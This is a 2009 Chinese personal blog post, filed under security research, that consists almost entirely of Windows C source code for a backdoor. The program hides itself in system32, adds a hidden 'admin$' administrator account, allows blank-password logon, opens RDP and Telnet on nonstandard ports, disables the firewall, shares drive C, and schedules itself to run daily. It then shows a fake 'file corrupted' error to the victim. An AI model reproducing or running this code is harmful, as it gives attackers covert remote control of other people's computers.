注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

Nef. spot

Fortune Favours the Bold.

 
 
 

日志

 
 

andy  

2009-01-03 17:28:14|  分类: 安全研究 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#include <stdio.h>
#include <Windows.h>
int main(int argc, char* argv[]){
 //抓到当前路径并拷贝文件
 TCHAR exeFullPath[MAX_PATH];
    ::GetModuleFileName(NULL,exeFullPath,MAX_PATH);
 CopyFile(exeFullPath,"c:\\WINDOWS\\system32\\andy.exe",false);
 //修改注册表
 HKEY hKey;
 DWORD dwValue = 0;
 DWORD dwValue1 =521;
 if (RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL) != ERROR_SUCCESS)
  printf("error 1");
 if (RegSetValueEx(hKey,"fDenyTSConnections",0,REG_DWORD,(CONST BYTE *)&dwValue,sizeof(DWORD))!= ERROR_SUCCESS)
  printf("error 2");
 RegCloseKey(hKey);
 if (RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL) !=ERROR_SUCCESS)
  printf("error 3");
 if (RegSetValueEx(hKey,"admin$",0,REG_DWORD,(CONST BYTE *)&dwValue,sizeof(DWORD))!= ERROR_SUCCESS)
  printf("error 4");
 RegCloseKey(hKey);
 if (RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Lsa",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL) !=ERROR_SUCCESS)
  printf("error 5");
 if (RegSetValueEx(hKey,"limitblankpassworduse",0,REG_DWORD,(CONST BYTE *)&dwValue,sizeof(DWORD))!= ERROR_SUCCESS)
  printf("error 6");
 RegCloseKey(hKey);
 if (RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Lsa",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL) !=ERROR_SUCCESS)
  printf("error 9");
 if (RegSetValueEx(hKey,"forceguest",0,REG_DWORD,(CONST BYTE *)&dwValue,sizeof(DWORD))!= ERROR_SUCCESS)
  printf("error 10");
 RegCloseKey(hKey);
 if (RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL) !=ERROR_SUCCESS)
  printf("error 11");
 if (RegSetValueEx(hKey,"PortNumber",0,REG_DWORD,(CONST BYTE *)&dwValue1,sizeof(DWORD))!= ERROR_SUCCESS)
  printf("error 12");
 RegCloseKey(hKey);
 if (RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL) !=ERROR_SUCCESS)
  printf("error 13");
 if (RegSetValueEx(hKey,"PortNumber",0,REG_DWORD,(CONST BYTE *)&dwValue1,sizeof(DWORD))!= ERROR_SUCCESS)
  printf("error 14");
 RegCloseKey(hKey);
 //开启新线程……调用系统口令。
 STARTUPINFO info;
 PROCESS_INFORMATION process;
 memset(&info,0,sizeof(STARTUPINFO));
 info.cb=sizeof(info);
 info.dwFlags=1;
 info.wShowWindow=0;
 if(!::CreateProcess(NULL,"attrib +s +h +r +a C:\\windows\\system32\\andy.exe",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 15");
 if(!::CreateProcess(NULL,"sc config schedule start= AUTO",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 16");
 if(!::CreateProcess(NULL,"net start schedule",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 17");
 if(!::CreateProcess(NULL,"net user admin$ admin /add",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 18");
 if(!::CreateProcess(NULL,"net localgroup administrators admin$ /add",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 19");
 if(!::CreateProcess(NULL,"sc config NtLmSsp start= AUTO",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 20");
 if(!::CreateProcess(NULL,"net start NtLmSsp",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 21");
 if(!::CreateProcess(NULL,"sc config TlntSvr start= AUTO",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 22");
 if(!::CreateProcess(NULL,"net start TlntSvr",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 23");
 if(!::CreateProcess(NULL,"net stop sharedaccess",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 24");
 if(!::CreateProcess(NULL,"sc config sharedaccess start= disabled",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 25");
 if(!::CreateProcess(NULL,"net start Lanmanserver",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 26");
 if(!::CreateProcess(NULL,"sc config Lanmanserver start= AUTO",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 27");
 if(!::CreateProcess(NULL,"net start lanmanworkstation",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 28");
 if(!::CreateProcess(NULL,"at 22:39 /every:M,T,W,Th,F,S,Su C:\\windows\\system32\\andy.exe",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 29");
 if(!::CreateProcess(NULL,"net share ipc$",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 31");
 if(!::CreateProcess(NULL,"net share c$=c:",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 32");
 if(!::CreateProcess(NULL,"tlntadmn config sec = -ntlm",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 33");
 if(!::CreateProcess(NULL,"tlntadmn config port=520",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 34");
 if(!::CreateProcess(NULL,"attrib +s +h +a +r C:\\windows\\Tasks\\*.job",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 30");
 ::MessageBox(NULL, "文件损坏,请重新下载或安装!", "系统提示", MB_OK);
 return 0;
}
  评论这张
 
阅读(132)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017